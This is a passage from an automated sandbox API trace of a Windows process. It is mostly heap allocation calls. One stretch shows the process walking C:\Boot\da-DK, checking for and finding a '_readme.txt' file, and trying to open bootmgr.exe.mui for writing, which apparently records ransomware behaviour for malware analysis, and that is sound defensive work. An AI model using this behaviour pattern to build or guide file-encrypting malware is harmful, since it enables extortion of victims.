0x3240b68 [0146.708] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.709] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.709] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.709] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.709] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.709] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.709] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.709] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.709] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.709] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.709] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.709] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.709] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.709] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.709] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.709] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.709] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.709] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.709] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.709] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.709] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.709] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.709] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.709] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.709] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.709] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.709] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.709] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.709] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.710] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.710] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.710] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.710] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.710] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.710] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.710] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.710] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.710] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.710] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.710] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.710] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.710] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.710] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.710] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.710] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.710] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.710] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.710] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.710] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.710] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.710] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.710] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.710] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.710] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.710] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.710] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.710] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.710] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.711] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.711] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.711] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.711] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.711] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.711] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.711] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.711] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.711] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.711] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.711] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.711] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.711] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.711] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.711] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.711] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.711] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.711] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.711] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.711] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.711] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.711] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.711] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.711] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.711] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.711] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.711] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.711] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.712] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.712] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.712] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.712] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.712] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.712] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.712] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.712] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.712] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.712] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.712] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.712] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.712] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.712] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.712] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.712] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.712] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.712] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.712] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.712] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.712] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.712] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.712] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.712] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.712] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.712] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.712] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.712] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.713] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0146.713] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.713] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.713] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.713] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.713] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.713] PathFindFileNameW (pszPath="") returned="" [0146.713] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.713] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.713] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.713] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.713] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.713] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.714] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.714] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.714] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.714] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.714] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.714] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.714] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.714] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.714] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.714] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x81c) returned 0x328ec10 [0146.714] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0146.714] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.714] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.714] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0146.714] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.714] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.714] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.714] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.715] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.715] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.715] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.715] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.715] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.715] PathFindExtensionW (pszPath="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned=".mui" [0146.715] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.715] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.715] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea87470, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.715] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.715] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.715] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.715] PathFindExtensionW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned=".txt" [0146.715] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.715] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea87470, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.715] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.715] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.715] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240ca8 | out: hHeap=0x6e0000) returned 1 [0146.716] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.716] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ca8 [0146.716] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.716] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.716] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.716] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.716] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.716] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.716] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.716] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.716] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.716] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.716] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.716] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.716] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.716] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.716] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.716] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.716] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.716] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.716] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.716] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.716] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.716] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.716] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.716] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.716] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.716] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.716] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.717] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.717] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.717] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.717] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.717] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.717] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.717] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.717] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.717] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.717] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.717] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.717] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.717] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.717] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.717] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.717] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.717] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.717] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.717] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.717] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.717] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.717] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.717] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.717] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.717] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.717] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.717] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.717] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.718] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 